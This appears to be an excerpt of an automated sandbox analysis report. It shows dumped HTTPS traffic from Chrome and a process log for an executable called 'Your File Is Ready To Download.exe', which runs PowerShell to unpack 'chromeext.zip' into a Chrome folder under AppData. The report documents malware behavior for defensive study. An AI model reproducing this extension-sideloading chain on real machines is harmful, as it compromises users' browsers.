                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC164INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 34 70 78 7d 2e 67 62 5f 70 61 3a 6e 6f 74 28 2e 67 62 5f 71 61 29 20 2e 67 62 5f 57 63 20 2e 67 62 5f 6e 63 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 67 62 5f 4d 63 20 2e 67 62 5f 6e 63 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 68 65 69 67 68 74 3a 34 38 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a
                                                                                                                                                                                                                        Data Ascii: padding-bottom:8px;padding-left:24px}.gb_pa:not(.gb_qa) .gb_Wc .gb_nc{-webkit-box-align:center;-webkit-align-items:center;align-items:center;display:-webkit-box;display:-webkit-flex;display:flex}.gb_Mc .gb_nc{display:table-cell;height:48px;vertical-align:
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC165INData Raw: 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 34 29 3b 77 69 64 74 68 3a 33 34 70 78 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 65 61 73 65 20 31 35 30 6d 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 65 61 73 65 20 31 35 30 6d 73 7d 2e 67 62 5f 71 66 5b 61 72 69 61 2d 70 72 65 73 73 65 64 5c 75 30 30 33 64 74 72 75 65 5d 20 2e 67 62 5f 72 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35
                                                                                                                                                                                                                        Data Ascii: x rgba(0,0,0,.24);width:34px;height:17px;-webkit-border-radius:8px;border-radius:8px;position:relative;-webkit-transition:background-color ease 150ms;transition:background-color ease 150ms}.gb_qf[aria-pressed\u003dtrue] .gb_rf{background-color:rgba(255,25
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC166INData Raw: 34 70 78 7d 2e 67 62 5f 76 65 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6f 70 61 63 69 74 79 3a 30 2e 35 34 7d 2e 67 62 5f 77 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 35 70 78 20 35 70 78 20 2d 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 2c 30 70 78 20 38 70 78 20 31 30 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 30 70 78 20 33 70 78 20 31 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 35 70 78 20 35 70 78 20 2d 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 2c 30 70 78 20 38 70 78 20 31 30 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31
                                                                                                                                                                                                                        Data Ascii: 4px}.gb_ve{color:black;opacity:0.54}.gb_we{background:white;-webkit-box-shadow:0px 5px 5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.14),0px 3px 14px 2px rgba(0,0,0,0.12);box-shadow:0px 5px 5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.1
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC167INData Raw: 66 2e 67 62 5f 69 66 2c 2e 67 62 5f 6a 66 2e 67 62 5f 69 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 70 78 7d 2e 67 62 5f 6a 66 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 68 66 2c 2e 67 62 5f 6a 66 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 7d 2e 67 62 5f 6b 66 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 6f 70 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 32 35 30 6d 73 20 65 61 73 65 2d 6f 75 74 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69
                                                                                                                                                                                                                        Data Ascii: f.gb_if,.gb_jf.gb_if{padding-left:2px;padding-right:2px}.gb_jf{display:none}.gb_hf,.gb_jf{float:left;position:absolute;top:0}.gb_kf{position:absolute;right:0;cursor:default;visibility:hidden;top:0;-webkit-transition:opacity 250ms ease-out;transition:opaci
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC169INData Raw: 5f 4e 65 2e 67 62 5f 79 65 3a 6e 6f 74 28 2e 67 62 5f 4d 29 20 2e 67 62 5f 6e 66 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 2e 67 62 5f 4d 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 2e 67 62 5f 4d 20 2e 67 62 5f 68 66 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 20 2e 67 62 5f 68 66 7b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 2e 67 62 5f 4d 20 2e 67 62 5f 6a 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 5f 70 61 2e 67 62 5f 48 63 20 2e 67 62 5f 45 64 2e 67 62 5f 78 65 3a 6e 6f 74 28
                                                                                                                                                                                                                        Data Ascii: _Ne.gb_ye:not(.gb_M) .gb_nf{display:none}.gb_Ne.gb_ye.gb_M{margin-left:0;position:absolute;width:auto}.gb_Ne.gb_ye.gb_M .gb_hf{display:none}.gb_Ne.gb_ye .gb_hf{padding:0;position:static}.gb_Ne.gb_ye.gb_M .gb_jf{display:block}.gb_pa.gb_Hc .gb_Ed.gb_xe:not(
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC170INData Raw: 6e 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 57 63 2c 2e 67 62 5f 46 64 2e 67 62 5f 4c 64 2e 67 62 5f 4d 64 5c 75 30 30 33 65 2e 67 62 5f 57 63 7b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 50 64 2c 2e 67 62 5f 46 64 2e 67 62 5f 4c 64 2e 67 62 5f 4d 64 5c 75 30 30 33 65 2e 67 62 5f 50 64 7b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 73 65 6e 74 69 6e 65 6c 7b 7d 22 7d 7d 2c 22 70 61 67 65 5f 74 69 74 6c 65 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 70 61 67 65 2d 74 69 74 6c 65 22 2c 22 70 72 6f 64
                                                                                                                                                                                                                        Data Ascii: n}.gb_pa.gb_qa .gb_Wc,.gb_Fd.gb_Ld.gb_Md\u003e.gb_Wc{-webkit-flex:1 1 auto;flex:1 1 auto;overflow:hidden}.gb_pa.gb_qa .gb_Pd,.gb_Fd.gb_Ld.gb_Md\u003e.gb_Pd{-webkit-flex:0 0 auto;flex:0 0 auto}sentinel{}"}},"page_title_placeholder_label":"page-title","prod
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC170INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        6192.168.2.349717142.250.181.228443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC8OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC12INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Version: 413663202
                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        BFCache-Opt-In: unload
                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                        Date: Mon, 06 Dec 2021 18:08:52 GMT
                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Set-Cookie: CONSENT=PENDING+772; expires=Wed, 06-Dec-2023 18:08:52 GMT; path=/; domain=.google.com; Secure
                                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Expires: Mon, 06 Dec 2021 18:08:52 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC12INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                        Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC13INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                        7192.168.2.349725142.250.186.65443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC170OUTGET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1
                                                                                                                                                                                                                        Host: clients2.googleusercontent.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC171INHTTP/1.1 200 OK
                                                                                                                                                                                                                        X-GUploader-UploadID: ADPycdvvKSaa9fa8Te-3ZOrnxF-0UWK9l3vMqmlwazxRHTk0Iv-jWpXkJgVWezDk0k2FfVZflNf3Z7lBwJwGV0Phx0S2XGGkXA
                                                                                                                                                                                                                        Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                        Content-Disposition: attachment; filename="extension_8520_615_0_5.crx"
                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                        ETag: 730d2491_a246e948_e80d9c94_d8b3f142_86eb8dd2
                                                                                                                                                                                                                        Last-Modified: Wed, 05 Aug 2020 01:15:29 GMT
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Sun, 05 Dec 2021 19:07:53 GMT
                                                                                                                                                                                                                        Expires: Mon, 05 Dec 2022 19:07:53 GMT
                                                                                                                                                                                                                        X-Goog-Hash: crc32c=DxAZGA==
                                                                                                                                                                                                                        Content-Length: 768843
                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                        Age: 82863
                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC172INData Raw: 43 72 32 34 03 00 00 00 18 04 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d
                                                                                                                                                                                                                        Data Ascii: Cr240"0*H0\7c<Fto82'5qk%2CF9#exQ[L|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k|1n<Fbf*Q1s2{*6PpobM
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC172INData Raw: 40 3b f4 9e 6a bc a6 ca cb a3 80 eb 8b 1c a8 07 a9 3d 61 65 c8 c2 d3 30 c2 ff f6 cc 90 8b f9 14 44 55 b1 1f a8 1a 6e 1c 91 f5 6e 12 3b ff 49 70 72 cc a2 1f 51 db 15 1c 81 3a 10 b6 e5 20 3c e2 ad 87 0f d5 1e 80 61 09 59 dc 93 f3 83 96 97 87 7b 65 69 9e cd 12 a8 02 0a a2 01 30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 cd 4d 62 68 3d 9f 5b 4f 7d b2 2b 1b ae 55 af 4b 48 46 28 6e 33 e8 5c 22 d7 dd d8 2c 67 d7 63 0e b5 8a 36 29 13 10 28 dd 45 ed ff 00 55 db fa ff 23 92 69 ad 61 03 e7 3a 04 98 9f 4e 89 fd 0a 1d 0e 50 88 1b a9 78 ef 4f a0 90 ea 28 6d 43 3b 7c eb 35 01 53 ac 7b 6d ea 61 45 78 8d bb 91 5b 7f 98 66 50 af 69 60 85 79 cc c2 35 b1 88 52 02 84 8b 90 76 7f 24 1a cf 2e b4 00 bd 6c 2d 6d ee b5 02 03 01 00 01 12 80
                                                                                                                                                                                                                        Data Ascii: @;j=ae0DUnn;IprQ: <aY{ei00*H0Mbh=[O}+UKHF(n3\",gc6)(EU#ia:NPxO(mC;|5S{maEx[fPi`y5Rv$.l-m
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC173INData Raw: f6 ad c7 4a cb 2f 1f 77 0d f5 97 97 c5 5f 2f ee 4b 21 c4 5f 5e de 7e 29 ae 9a 3f 8a c1 c7 9b f2 f2 e7 8b 83 8f 77 77 5f 6e 7f 7a f9 f2 f6 fe cb 97 eb 9b bb 17 1f 6a 3b be 58 5f ff fa 72 bd d5 ec cb e2 ea f6 df e5 cd 4b 08 bb 2a 89 5f 1c 0c ee 8a 9b 0f e5 1d 8c 5f ae 3e 17 57 ff bc 38 68 04 57 0f 19 ac 3f 17 b7 b7 70 f1 a6 fc d7 fd a7 9b 72 f3 3c ce 08 06 5e 7d 78 7e fb f1 fa df 70 f1 7f ee ae bf bc b8 bd bf bc fc b4 fe 04 8b 3b 2e cb cd aa 58 57 a2 6a 15 40 46 b0 99 55 06 9e 99 69 25 32 27 d9 60 40 0f c3 54 2a 57 e8 61 24 24 d0 59 30 1d a0 d3 c5 2c ef b6 1e 00 31 f7 64 d3 b3 96 91 0f 99 4e 45 d3 31 4b 63 4d 47 0d f6 3b ea d5 06 08 c9 60 85 f7 ca 04 25 25 9f d1 eb e0 30 31 ee e2 c8 60 5c 26 20 9b 40 82 ca bc 08 da b0 e5 57 6c c7 37 d9 13 d3 66 94 a2 02 c8
                                                                                                                                                                                                                        Data Ascii: J/w_/K!_^~)?ww_nzj;X_rK*__>W8hW?pr<^}x~p;.XWj@FUi%2'`@T*Wa$$Y0,1dNE1KcMG;`%%01`\& @Wl7f
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC175INData Raw: 5d 60 c4 24 86 5a 22 50 76 a3 9d 09 c2 58 61 80 31 5b de 09 1f d7 40 b6 42 55 3d 6c 6f 80 83 85 4c 08 e3 be 83 df 3c 6c 95 58 00 2b 52 42 5c b4 a3 e9 e8 90 f5 00 4c fc b4 1c 95 ad 07 ab 8d 6f 6f 8d 54 81 3a aa a3 88 45 b7 9f db fc b8 cd 34 1c a4 2f c8 d3 56 ad 05 64 e8 c5 c2 1d 97 6b ff e8 92 ca 4d fa c0 82 a0 9b cd 2a c5 b6 b8 32 0a bc d8 f0 a7 fd f9 1d 53 75 85 47 b6 62 5b 97 15 31 5f ec 34 e8 4b 82 df 3b dd f5 26 a3 7f 47 af 7c 4f 33 bc 69 98 32 ae b8 bf d7 fd c4 f6 f6 dd cd f5 fd ea 73 79 fb f1 fa fa 0e db dc 56 69 d7 74 4c 2d f0 51 c0 2e ca 67 19 00 85 20 ac 64 d1 02 96 dd 08 6b 75 1c 99 59 5b 6d c2 d8 10 64 d5 21 60 db 48 3b c1 17 9b 72 85 d9 7a 55 d3 94 b3 da 5b 88 6f ed 83 75 3a 28 eb d8 8e 03 44 7d 1d 23 9d 94 a5 77 f7 49 08 6d 8c f6 c4 ac 17 7b
                                                                                                                                                                                                                        Data Ascii: ]`$Z"PvXa1[@BU=loL<lX+RB\LooT:E4/VdkM*2SuGb[1_4K;&G|O3i2syVitL-Q.g dkuY[md!`H;rzU[ou:(D}#wIm{
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC176INData Raw: 12 a8 5f c5 66 cd c3 99 c5 91 4d 0d 49 77 54 3b 27 68 d1 9c 97 d4 bf 7b 33 52 9b 72 ba 09 24 e6 1f 9c a8 95 56 1a 6f 24 00 7c 40 f9 19 f8 30 37 d3 e6 d4 62 1c 03 d3 94 36 68 11 94 87 e9 3b b5 67 77 22 7d 31 81 0d 1f 30 71 80 3c ec a4 b4 42 54 d1 c3 35 69 38 22 ec 33 e1 aa 6d 2e 51 6d bb 18 e0 59 66 cf 0b 0c 0f 70 d9 d8 d4 a2 fb 54 a1 a3 e3 76 9c 26 87 3b e2 9e 47 db bf 69 0a 4c a8 7a 35 e0 b4 32 78 98 5f f0 c0 fe bf 7b 6e 0d 7a 41 c1 15 1a 87 ac ed aa c2 65 ab 73 76 7b 28 59 ef 09 08 94 0f 15 ea ed f9 b8 9e b5 26 fe 56 14 e4 a7 82 b2 0f 86 9d 94 7e 3c 9c a1 0a eb 03 a7 f1 38 22 a2 f5 35 e6 21 34 3d a9 cb cd 69 05 ec 3e 56 a7 a1 33 e1 bd f6 0a a2 05 c2 86 ed a8 fd 8e 3b 8d 4f df ce 8d 00 86 c8 e0 4e 48 3d 79 a7 f6 2c 3f 1a 0d 97 d3 c9 62 9e 4f 97 c3 a3 a3
                                                                                                                                                                                                                        Data Ascii: _fMIwT;'h{3Rr$Vo$|@07b6h;gw"}10q<BT5i8"3m.QmYfpTv&;GiLz52x_{nzAesv{(Y&V~<8"5!4=i>V3;ONH=y,?bO
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC177INData Raw: 00 00 00 00 00 19 00 00 00 5f 6c 6f 63 61 6c 65 73 2f 61 72 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e e5 5c 6d 6f 1b 37 12 fe 2b 3a 5f 3e b4 45 63 f3 75 49 06 ed 01 8a b5 76 b6 b1 25 57 2f 0e 52 04 10 64 5b 4e 82 4b e2 9c ed a0 38 04 fe ef 37 bb e4 7a 87 e2 50 92 d3 24 77 c0 7d 91 e5 5d 71 c8 19 ce cb 33 33 dc fd bc c3 19 b7 ce 2a 5d 70 65 ad 16 4c 73 b3 f3 a4 f7 79 e7 fd f2 e6 66 f1 7a 09 df 77 5e 7d 62 85 5a d4 9f a2 f9 54 b6 f9 14 cd 27 df b9 fb b9 b7 c3 05 97 4e 1b 67 85 11 d2 1a ed 04 a3 a8 08 e9 69 f5 9a 3f ba f9 2c 9a 7f 84 69 fe 51 f5 a7 74 cd 15 db 5d 97 bc fb 2e 16 c9 00 bf 2c 7c 25 2c d7 f5 d0 aa 9b e9 c4 99 ff 51 0f 2d a7 21 2e 0b 74 c3 73 28 fd 02 79 0f 2d 4d 75 4b 53 12 11 6f be f3 cb 20 0c 10 43 61 0d f0 c6 24 77 cc 68 52 16 66 95 48 20 6e
                                                                                                                                                                                                                        Data Ascii: _locales/ar/messages.json\mo7+:_>EcuIv%W/Rd[NK87zP$w}]q33*]peLsyfzw^}bZT'Ngi?,iQt].,|%,Q-!.ts(y-MuKSo Ca$whRfH n
                                                                                                                                                                                                                        2021-12-06 18:08:56 UTC178INData Raw: ff 9a df 22 eb 45 29 6c bb 84 d4 3c 08 43 4d 27 72 ab 13 45 df b3 50 27 c7 2a a6 1d 34 06 e5 5b 82 48 b7 65 32 69 9a bf 05 ae 83 51 65 5c 62 f0 98 18 b3 0b 1c 53 71 96 ab d2 75 e0 4c 79 d9 c9 2c 84 df 50 94 40 08 8f 72 ec d9 34 b3 d7 2d 6a 1b dc d8 d2 c6 ba 8f 93 c9 a8 d0 11 b9 41 db 5d 27 d8 c3 46 11 a9 55 58 73 d1 8d 0e 1a e3 af 04 c9 62 08 91 86 3b b3 8b a4 4d 19 09 2e 0a e0 e5 a0 bd cf 2b f3 36 90 3c d5 7e 62 27 09 c5 c1 5c c8 54 99 d3 01 48 ef 23 03 72 71 56 89 38 c5 ce 33 48 36 17 d9 fd 62 43 86 be 9b 6a 30 21 d9 8b d5 5d 8f cb 54 5f a8 33 04 b2 4b ab 5f d8 13 04 7a c8 0e d9 79 0f dd 46 e2 6c 8d 5c d2 34 02 7b 58 ef 24 ae ac 98 8e ed 98 49 8b 2c 4d a2 a0 11 76 34 06 6e 78 9b 22 21 a0 a2 10 2e 75 44 a9 9d 88 a1 ec ea fe 46 da 9e 75 a6 58 b6 b8 34 18
                                                                                                                                                                                                                        Data Ascii: "E)l<CM'rEP'*4[He2iQe\bSquLy,P@r4-jA]'FUXsb;M.+6<~b'\TH#rqV83H6bCj0!]T_3K_zyFl\4{X$I,Mv4nx"!.uDFuX4


                                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:19:08:31
                                                                                                                                                                                                                        Start date:06/12/2021
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Your File Is Ready To Download.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Your File Is Ready To Download.exe"
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1217816 bytes
                                                                                                                                                                                                                        MD5 hash:B864CEFDEAC3D2C58DE4D14BAB8265F1
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:19:08:33
                                                                                                                                                                                                                        Start date:06/12/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'
                                                                                                                                                                                                                        Imagebase:0x7ff777fc0000
                                                                                                                                                                                                                        File size:447488 bytes
                                                                                                                                                                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:19:08:34
                                                                                                                                                                                                                        Start date:06/12/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:19:08:47
                                                                                                                                                                                                                        Start date:06/12/2021
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized
                                                                                                                                                                                                                        Imagebase:0x7ff68b0a0000
                                                                                                                                                                                                                        File size:2150896 bytes
                                                                                                                                                                                                                        MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                                                                                        Has elevated privileges:true
